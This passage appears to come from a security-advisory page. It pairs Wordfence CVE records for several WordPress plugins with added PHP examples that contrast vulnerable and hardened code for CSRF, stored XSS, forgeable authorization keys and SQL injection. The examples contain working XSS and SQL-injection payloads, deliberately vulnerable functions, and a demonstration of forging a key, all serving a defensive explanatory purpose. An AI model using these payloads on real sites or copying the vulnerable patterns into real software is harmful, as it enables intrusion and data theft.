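// Forged cross-site request: correct field names, no token.
$forged = ['ping_key' => '"><script>alert(1)</script>'];
echo handle_settings_update($admin, $forged, $options) === null
    ? "forged request: rejected\n" : "forged request: accepted\n";

// Legitimate submission from the form this site rendered for user 1.
$legit = ['ping_key' => 'abc123', '_token' => make_csrf_token(1, 'update-settings')];
$saved = handle_settings_update($admin, $legit, $options);
echo 'legitimate request: ', $saved === null ? 'rejected' : 'saved ping_key=' . $saved['ping_key'], "\n";

// Even if a hostile value were ever stored, escaping at output keeps it from executing.
echo render_setting_field('ping_key', $forged['ping_key']), "\n";
```

Run with `php csrf_token.php`. The forged request carries the right field names but no token, so it is refused before any option is written. The escaping in render_setting_field() addresses the second half of the Publish 2 Ping.fm record, which becomes stored XSS only when a saved setting is later echoed into the admin page without escaping.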

CVE-2026-5247 (GCVE-0-2026-5247)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories <= 4.10.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'wrapper' Shortcode Attribute
Summary
The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wrapper' attribute of the [futureaction] shortcode in all versions up to, and including, 4.10.0. This is due to insufficient input sanitization on the wrapper attribute. The plugin uses esc_html() to escape the value, but esc_html() only encodes HTML entities and does not prevent attribute injection when the value is used as an HTML tag name in a sprintf() call. An attacker can inject event handler attributes via spaces in the wrapper value. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Since it is also possible for administrators to make this functionality available to lower-privileged users, this introduces the possibility of abuse by contributors.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Credits
Djaidja Moundjid

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories",
          "vendor": "publishpress",
          "versions": [
            {
              "lessThanOrEqual": "4.10.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Djaidja Moundjid"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027wrapper\u0027 attribute of the [futureaction] shortcode in all versions up to, and including, 4.10.0. This is due to insufficient input sanitization on the wrapper attribute. The plugin uses esc_html() to escape the value, but esc_html() only encodes HTML entities and does not prevent attribute injection when the value is used as an HTML tag name in a sprintf() call. An attacker can inject event handler attributes via spaces in the wrapper value. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Since it is also possible for administrators to make this functionality available to lower-privileged users, this introduces the possibility of abuse by contributors."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:56.378Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9acf80aa-8354-4430-9836-18fa17854521?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/post-expirator/trunk/src/Modules/Expirator/Controllers/ShortcodeController.php#L173"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/post-expirator/tags/4.9.4/src/Modules/Expirator/Controllers/ShortcodeController.php#L173"
        },
        {
          "url": "https://github.com/publishpress/publishpress-future/releases"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-03-31T15:33:05.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-05-04T14:02:32.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories \u003c= 4.10.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via \u0027wrapper\u0027 Shortcode Attribute"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5247",
    "datePublished": "2026-05-05T02:26:56.378Z",
    "dateReserved": "2026-03-31T15:17:50.677Z",
    "dateUpdated": "2026-05-05T02:26:56.378Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
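The PublishPress Future record above makes a point worth isolating: esc_html() is the right tool when a value lands between tags and the wrong tool when the value becomes the tag name itself, because a tag name ends at the first space and entity encoding never touches spaces or '='. The PHP below is an added example and not the plugin's code. htmlspecialchars() stands in for esc_html() (assumption: both leave space and '=' alone, which is all the example relies on), and the [futureaction] content and the allowed-tag list are illustrative.

```php
<?php
declare(strict_types=1);

/** Stand-in for esc_html(): encodes & < > " ' but, like esc_html(), leaves space and '=' alone. */
function esc_html_like(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern: the escaped value is used as the tag NAME inside sprintf(). */
function render_wrapper_vulnerable(string $wrapper, string $content): string {
    return sprintf('<%1$s>%2$s</%1$s>', esc_html_like($wrapper), esc_html_like($content));
}

/** Hardened: a tag name is a token from a fixed vocabulary, so validate it, don't escape it. */
function render_wrapper_hardened(string $wrapper, string $content): string {
    static $allowed = ['div', 'span', 'p', 'section'];
    $tag = strtolower(trim($wrapper));
    if (!in_array($tag, $allowed, true)) {
        $tag = 'div'; // safe default instead of echoing attacker-chosen text into the tag
    }
    return sprintf('<%1$s>%2$s</%1$s>', $tag, esc_html_like($content));
}

// What a shortcode author controls, e.g. [futureaction wrapper="..."]. The payload contains
// none of < > " ' so entity encoding changes nothing about it; the space does the work.
$payload = 'div onmouseover=alert(1)';

echo render_wrapper_vulnerable($payload, 'Expires soon'), "\n";
echo render_wrapper_hardened($payload, 'Expires soon'), "\n";

// A wrapper that DOES contain markup characters is neutralised by the encoder alone;
// the weakness is the output context, not the strength of the escaping function.
echo render_wrapper_vulnerable('<b>', 'Expires soon'), "\n";
```

The first line printed is `<div onmouseover=alert(1)>Expires soon</div onmouseover=alert(1)>`, a live event handler produced entirely from "escaped" input; the hardened renderer prints a plain `<div>` because the value failed the allow-list. The same reasoning applies to any value that ends up as an attribute name, a URL scheme or a CSS identifier: choose the validator for the context, not a generic encoder.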

CVE-2026-4409 (GCVE-0-2026-4409)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Subscribe To Comments Reloaded <= 240119 - Improper Authorization to Unauthenticated Arbitrary Subscription Management
Summary
The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users.
CWE
  • CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Assigner
Impacted products
Vendor Product Version
wpkube Subscribe To Comments Reloaded Affected: 0 , ≤ 240119 (semver)
Credits
Supakiad S.

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Subscribe To Comments Reloaded",
          "vendor": "wpkube",
          "versions": [
            {
              "lessThanOrEqual": "240119",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Supakiad S."
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200 Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:55.996Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91f9235e-f578-475f-92c3-34062d6d1e3d?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/wp_subscribe_reloaded.php#L1613"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/utils/stcr_utils.php#L164"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/templates/user.php#L37"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-02-24T00:00:00.000Z",
          "value": "Discovered"
        },
        {
          "lang": "en",
          "time": "2026-05-04T14:11:52.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Subscribe To Comments Reloaded \u003c= 240119 - Improper Authorization to Unauthenticated Arbitrary Subscription Management"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-4409",
    "datePublished": "2026-05-05T02:26:55.996Z",
    "dateReserved": "2026-03-18T23:02:48.429Z",
    "dateUpdated": "2026-05-05T02:26:55.996Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
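The Subscribe To Comments Reloaded record above describes an authorization key that becomes forgeable once a site-wide key leaks into public pages. The page does not give the plugin's derivation, so the PHP below is an added, illustrative example and not the plugin's code. The weak half assumes a key of the form md5(global_key . email), chosen only to show why any key computable from a leaked constant plus public data is forgeable; the hardened half replaces derivation with a per-subscription random token whose hash is stored server side and compared in constant time. The SubscriptionStore class and the e-mail addresses are constructed for the example.

```php
<?php
declare(strict_types=1);

/* --- Assumed weak scheme (illustration, NOT the plugin's actual code) ---
 * The subscriber's authorization key is derived from a site-wide key and
 * public data (the e-mail address). If the site-wide key is ever emitted
 * into a public page, a key for ANY address can be computed offline; a
 * fast unkeyed hash adds nothing, because there is no secret left to guess. */
function weak_auth_key(string $global_key, string $email): string {
    return md5($global_key . $email);
}

function weak_manage_subscription(string $global_key, string $email, string $presented_key): bool {
    return $presented_key === weak_auth_key($global_key, $email);
}

/* --- Hardened scheme: per-subscription random secret, stored hashed server side --- */
final class SubscriptionStore {
    /** @var array<string,string> email => sha256(token) */
    private array $tokens = [];

    /** Issue a fresh 256-bit token; the raw token goes into the e-mailed link, only its hash is kept. */
    public function subscribe(string $email): string {
        $token = bin2hex(random_bytes(32));
        $this->tokens[$email] = hash('sha256', $token);
        return $token;
    }

    /** A manage request must present this address's own token; compare in constant time. */
    public function authorize(string $email, string $presented): bool {
        if (!isset($this->tokens[$email])) {
            return false;
        }
        return hash_equals($this->tokens[$email], hash('sha256', $presented));
    }
}

// Attacker who scraped the global key from a public post page forges bob's key.
$leaked = 'site-wide-key-that-appeared-in-page-source'; // constructed value
$forged = weak_auth_key($leaked, 'bob@example.test');
echo weak_manage_subscription($leaked, 'bob@example.test', $forged)
    ? "weak scheme: forged key accepted\n" : "weak scheme: forged key rejected\n";

// Hardened: nothing on any public page lets the attacker compute bob's token.
$store    = new SubscriptionStore();
$bobToken = $store->subscribe('bob@example.test');
$guess    = hash('sha256', $leaked . 'bob@example.test'); // anything derivable from public data
echo $store->authorize('bob@example.test', $guess)
    ? "hardened: guess accepted\n" : "hardened: guess rejected\n";
echo $store->authorize('bob@example.test', $bobToken)
    ? "hardened: real token accepted\n" : "hardened: real token rejected\n";
```

With the hardened store a leaked page reveals nothing that lets an attacker act on another subscriber: tokens are issued and looked up, never derived, and because only the SHA-256 of each token is stored a database leak does not hand out usable management links either.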

CVE-2026-5100 (GCVE-0-2026-5100)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
AWP Classifieds <= 4.4.5 - Unauthenticated SQL Injection via 'regions'
Summary
The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CWE
  • CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
Impacted products
Vendor Product Version
strategy11team AWP Classifieds Affected: 0 , ≤ 4.4.5 (semver)
Credits
Hunter Jensen

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "AWP Classifieds",
          "vendor": "strategy11team",
          "versions": [
            {
              "lessThanOrEqual": "4.4.5",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Hunter Jensen"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the \u0027regions\u0027 parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:55.631Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7908d167-f831-4ed0-b754-2b390b5c3b2c?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1240"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1258"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1269"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1276"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L63"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L70"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L168"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L174"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L339"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L342"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L795"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L804"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L881"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L887"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L890"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L895"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L902"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L903"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:11:27.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "AWP Classifieds \u003c= 4.4.5 - Unauthenticated SQL Injection via \u0027regions\u0027"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-5100",
    "datePublished": "2026-05-05T02:26:55.631Z",
    "dateReserved": "2026-03-29T14:10:38.249Z",
    "dateUpdated": "2026-05-05T02:26:55.631Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}
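The AWP Classifieds record above is about where sanitisation is applied rather than whether: when a query array such as regions[...] is run through a value-oriented sanitiser, the keys pass through untouched, and if they are spliced into SQL as column names they become an injection point that $wpdb->prepare() placeholders cannot fix (placeholders bind values, not identifiers). The PHP below is an added example that runs against an in-memory SQLite database (requires pdo_sqlite). The listings table, its rows and the assumption that region keys select columns are constructed for the demonstration and are not the plugin's schema or code.

```php
<?php
declare(strict_types=1);

// In-memory SQLite so the example runs offline; schema and rows are constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, country TEXT, city TEXT, owner_email TEXT)');
$db->exec("INSERT INTO listings (title, country, city, owner_email) VALUES
    ('Bike', 'US', 'Austin', 'alice@example.test'),
    ('Sofa', 'FR', 'Lyon',   'bob@example.test')");

/**
 * Vulnerable shape (assumed, not the plugin's code): every VALUE is quoted, which is what
 * a value-oriented sanitiser such as array_map over $_GET['regions'] achieves, but each
 * KEY is spliced into the query as a column name untouched.
 */
function search_vulnerable(PDO $db, array $regions): array {
    $where = [];
    foreach ($regions as $column => $value) {
        $where[] = $column . ' = ' . $db->quote((string)$value); // $column is attacker text
    }
    return $db->query('SELECT title FROM listings WHERE ' . implode(' AND ', $where))
              ->fetchAll(PDO::FETCH_COLUMN);
}

/** Hardened: keys must name a searchable column; values travel as bound parameters. */
function search_hardened(PDO $db, array $regions): array {
    static $searchable = ['country', 'city'];
    $where  = [];
    $params = [];
    foreach ($regions as $column => $value) {
        if (!in_array($column, $searchable, true)) {
            throw new InvalidArgumentException("unknown region field: $column");
        }
        $where[]  = "$column = ?";
        $params[] = (string)$value;
    }
    if ($where === []) {
        throw new InvalidArgumentException('no search fields supplied');
    }
    $stmt = $db->prepare('SELECT title FROM listings WHERE ' . implode(' AND ', $where));
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Normal request, the PHP equivalent of ?regions[country]=US
print_r(search_vulnerable($db, ['country' => 'US']));

// Hostile request: the KEY carries SQL. The value 'x' is quoted correctly and is irrelevant
// because the trailing -- comments it out; the attacker now filters on owner_email, a column
// the search was never meant to expose, which is the basis for boolean-based extraction.
$hostile = ["0=1 OR owner_email LIKE 'b%' --" => 'x'];
print_r(search_vulnerable($db, $hostile));

try {
    search_hardened($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo 'hardened search rejected request: ', $e->getMessage(), "\n";
}
print_r(search_hardened($db, ['country' => 'US', 'city' => 'Austin']));
```

The hostile key is exactly what PHP builds from a query string of the form regions[<key>]=x. The hardened search rejects it because the key is checked against the column allow-list before it reaches the SQL text, and the value travels as a bound parameter; the same split applies in WordPress, where esc_sql() or $wpdb->prepare() protect values and an allow-list must protect identifiers.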

CVE-2025-13618 (GCVE-0-2025-13618)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Mentoring <= 1.2.8 - Unauthenticated Privilege Escalation in mentoring_process_registration
Summary
The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts.
CWE
  • CWE-269 - Improper Privilege Management
Assigner
Impacted products
Vendor Product Version
dreamstechnologies Mentoring Affected: 0 , ≤ 1.2.8 (semver)
Credits
Ismail Syaleh

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Mentoring",
          "vendor": "dreamstechnologies",
          "versions": [
            {
              "lessThanOrEqual": "1.2.8",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Ismail Syaleh"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-269",
              "description": "CWE-269 Improper Privilege Management",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:55.265Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7192fb4c-0434-4e11-a2a7-c205b8d6b68e?source=cve"
        },
        {
          "url": "https://themeforest.net/item/mentoring-education-wordpress-theme/36457081"
        },
        {
          "url": "https://mentoring-wp.dreamsmarketplace.com/documentation/changelog.html"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T13:32:59.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Mentoring \u003c= 1.2.8 - Unauthenticated Privilege Escalation in mentoring_process_registration"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2025-13618",
    "datePublished": "2026-05-05T02:26:55.265Z",
    "dateReserved": "2025-11-24T19:59:15.187Z",
    "dateUpdated": "2026-05-05T02:26:55.265Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-6696 (GCVE-0-2026-6696)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Zingaya Click-to-Call <= 1.0 - Reflected Cross-Site Scripting via 'email' Parameter
Summary
The Zingaya Click-to-Call plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email', 'first_name', 'last_name', and 'phone' parameters on the plugin's sign-up admin page in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Impacted products
Vendor Product Version
zingaya Zingaya Click-to-Call Affected: 0 , ≤ 1.0 (semver)
Credits
Julian Chibuike Nwadinobi

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Zingaya Click-to-Call",
          "vendor": "zingaya",
          "versions": [
            {
              "lessThanOrEqual": "1.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Julian Chibuike Nwadinobi"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Zingaya Click-to-Call plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u0027email\u0027, \u0027first_name\u0027, \u0027last_name\u0027, and \u0027phone\u0027 parameters on the plugin\u0027s sign-up admin page in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-05T02:26:54.906Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5bdd515c-6b52-467c-9446-6ae9b3b75e50?source=cve"
        },
        {
          "url": "https://wordpress.org/plugins/zingaya-click-to-call/"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L62"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L71"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L79"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L104"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-05-04T14:07:29.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Zingaya Click-to-Call \u003c= 1.0 - Reflected Cross-Site Scripting via \u0027email\u0027 Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-6696",
    "datePublished": "2026-05-05T02:26:54.906Z",
    "dateReserved": "2026-04-20T16:58:47.464Z",
    "dateUpdated": "2026-05-05T02:26:54.906Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-4730 (GCVE-0-2026-4730)

Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
Title
Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website <= 2.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'chartid' Shortcode Attribute
Summary
The Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CWE
  • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
Credits
Djaidja Moundjid

{
  "containers": {
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Charts Ninja: Create Beautiful Graphs \u0026 Charts and Easily Add Them to Your Website",
          "vendor": "commonninja",
          "versions": [
            {
              "lessThanOrEqual": "2.1.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Djaidja Moundjid"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Charts Ninja: Create Beautiful Graphs \u0026 Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027chartid\u0027 shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
